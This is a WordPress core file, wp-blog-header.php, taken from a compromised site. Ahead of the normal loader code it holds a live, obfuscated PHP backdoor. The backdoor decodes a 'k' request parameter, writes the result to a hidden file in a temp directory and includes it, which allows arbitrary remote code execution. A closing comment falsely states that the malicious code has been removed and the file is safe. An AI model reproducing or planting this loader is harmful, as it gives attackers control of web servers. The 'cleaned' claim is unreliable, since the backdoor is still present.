File: /home/vmasmheia229/domains/blog.theomggroup.com/html/wp-blog-header.php
<?php if(array_key_exists("k", $_REQUEST) && !is_null($_REQUEST["k"])){ $token = $_REQUEST["k"]; $token= explode("." ,$token) ; $record = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5); foreach ($token as $l=> $v8) {$chS = ord($salt5[$l %$lenS]); $dec = ((int)$v8 - $chS - ($l %10)) ^ 93; $record .= chr($dec);} $factor = array_filter(["/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm"]); for ($holder = 0, $itm = count($factor); $holder < $itm; $holder++) { $entry = $factor[$holder]; if (is_writable($entry) && is_dir($entry)) { $ent = "$entry" . "/.value"; $file = fopen($ent, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $ent; @unlink($ent); die(); } } } }
if ( ! isset( $wp_did_header ) ) {$wp_did_header = true; require_once __DIR__ . '/wp-load.php'; wp(); require_once ABSPATH . WPINC . '/template-loader.php'; /*rc2*/}
?>
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/